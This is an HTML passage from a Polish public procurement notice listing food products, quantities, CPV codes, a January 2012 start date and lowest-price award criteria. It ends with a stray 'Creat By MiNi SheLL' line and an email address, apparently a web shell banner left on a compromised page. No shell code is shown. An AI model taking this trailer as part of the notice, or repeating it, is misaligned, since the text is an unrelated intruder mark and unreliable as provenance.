	Bułka Wrocławska krojona	szt.	650		
	Makaron spaghetti	kg	120		
	Bułka tarta	kg.	85		
	Bułka mała - suszona	szt.	700		
	Kopytka świeże	kg	116		
	Pierogi ruskie świeże	kg	590.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Różne produkty spożywczr.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier 	kg	675		
	Cukier waniliowy 	op.32g	70		
	Drożdże 	kg	2		
	Kwasek cytrynowy 	op. 50g	108		
	Liście laurowe 	op. 6g	113		
	Przyprawa do zup w płynie	L.	190		
	Majeranek 	op. 8g	104		
	Pieprz mielony 	op. 20g	297		
	Sól 	kg	332		
	Sos w proszku  - sałatkowy	op. 800g	8		
	Ziele angielskie 	op. 15g	115		
	Chrzan w słoiku	280g	70		
	Dżem 	280 g	200		
	Groszek konserwowy 	400 ml	130		
	Koncentrat pomidorowy 	L.	120		
	Kukurydza konserwowa 	425 ml	124		
	Ketchup 	500 g	132		
	Majonez  	250 ml.	90		
	Musztarda 	180g	60		
	Sos  w proszku boloński	op. 1kg	18		
	Jarzynowa przyprawa w proszku do potraw	op. 75g	275		
	Cynamon	op. 20g	5		
	Kisiel	38 g	5		
	Nutella	385 g	35		
	Miód	280 g	5		
	Kakao	300g	15		
 	Herbata ekspresowa	op 100 sasz.	8		
	Płatki śniadaniowe cynamonowe	0,5 kg	25		
Płatki śniadaniowe czekoladowe kulki	0,5 kg	25			
Płatki śniadaniowe czekoladowe muszelki	0,5 kg	25			
Płatki śniadaniowe czekoladowe miodowe	0,5 kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 11.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com